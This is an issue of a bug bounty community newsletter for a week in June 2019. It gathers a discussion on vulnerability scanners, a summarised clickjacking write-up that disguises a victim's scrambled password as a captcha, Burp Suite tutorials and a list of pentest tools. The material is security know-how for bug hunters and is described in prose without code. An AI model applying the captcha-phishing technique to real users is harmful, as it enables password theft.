Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.
This issue covers the week from 21 to 28 of June.
Our favorite 5 hacking items
1. Discussion of the week
Do you use vulnerability scanner on bug bounty program? How is the result?
This is an interesting discussion for beginner bug hunters on why you shouldn’t use scanners in bug bounty.
Vulnerability scanners are of low added value because many other people (including internal pentesters) have probably already run them. So it’s improbable that they’ll allow you to find anything new of real value. This, combined with the risk of causing Denial of Service if many bug hunters use scanners on the same target, is why scanners are generally not allowed.
The following reasons apply to pentesting too: the risk of causing an email flood to a client email address (happened to me once!), and the risk of deleting resources by using spidering on authenticated pages.
These risks are good to know whether you’re a bug hunter or pentester. It helps decide which tools to run or not and avoid causing service disruptions.
Also, I find cym13‘s stance on Burp interesting. There really is no ‘one size fits all’!
2. Writeup of the week
GOTCHA: Taking phishing to a whole new level ($100 + $1000 bonus for creativity)
This is a writeup of a Clickjacking attack found during a live hacking event.
What tipped off @securinti was a button that triggered an AJAX request to display the user’s password. The requests didn’t use X-FRAME-OPTIONS headers so he was able to display the user’s password within an iframe. Classic clickjacking, but the problem is that he couldn’t read the password because of CORS.
His genious idea to bypass CORS and get the user’s password was to create an iframe that looked like a captcha form. He also scrambled the password’s letters to make it look like a captcha (so the user wouldn’t recognize that it was their own password). When they would enter the captcha, he would get it, re-order the letter and get their password.
If you want to know more about this kind of attacks, I recommend the paper Tell Me About Yourself: The Malicious CAPTCHA Attack
3. Tutorial of the week
Burp Suite tutorial: IDOR vulnerability automation using Autorize and AutoRepeater (bug bounty)
This video tutorial is a must if you’re serious about Web app security and don’t already use Autorize and Autorepeater. These are two Burp Suite extensions that can, among other things, be used to automatically detect IDOR.
This kind of advanced Burp usage can seem overwhelming or confusing if you’re starting out. So it’s nice to be walked through the whole process. Thank you @Regala_ and @stokfredrik!
4. Video of the week
Hands on Hacking with zseano & Bugbountynotes session carrying on
I lo-o-ove this live mentoring concept by @zseano. It is a great opportunity to spend a few hours hacking on a fake website created for the occasion, while being live with an online mentor, and also practice writing bug bounty reports. It’s fun whether you’re a beginner or a seasoned bug hunter.
I had network connection issues right when the live started. That was so annoying! But the next session is on July 21st.
5. Tool of the week
Taborator is a Burp extension that shows the Collaborator client in a tab (instead of a new Burp window by default).
So it’s more practical if you play with Collaborator often. It’s worthing checking out and is easy to install (via the BApp Store) and use.
Other amazing things we stumbled upon this week
Webinars & Webcasts
Medium to advanced
Responsible disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
If you don’t have time
- Minesweeper: A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking)
- Boo-Gen!: A Python script that takes a saved HTTP request from a file and then uses that to generate an HTTP Boofuzz script. It has been updated to handle POST requests & fuzz the post data
- See-SURF: Python based scanner to find potential SSRF parameters
- BaseCrack: Decoder Tool For Base Encoding Schemes (Base16, Base32, Base36…)
- Shania: Scan secrets from Continuous Integration Build Logs (CI / Circle CI / Gitlab CI)
- Linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
- Enumerate IAM permissions: Enumerate the permissions associated with AWS credential set
- Distill.io: Browser extension that allows you to monitor website changes
- Not Your Average Web Crawler: Execute your exploit against every request in scope
- Bashter: Web Crawler, Scanner, and Analyzer Framework (Shell-Script based)
- Cazador_unr: Simple Hacking tools for windows
- ADRecon: A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment
Misc. pentest & bug bounty resources
Bug bounty news
Breaches & Attacks
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 06/21/2019 to 06/28/2019.
Subscribe to the newsletter here!
The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.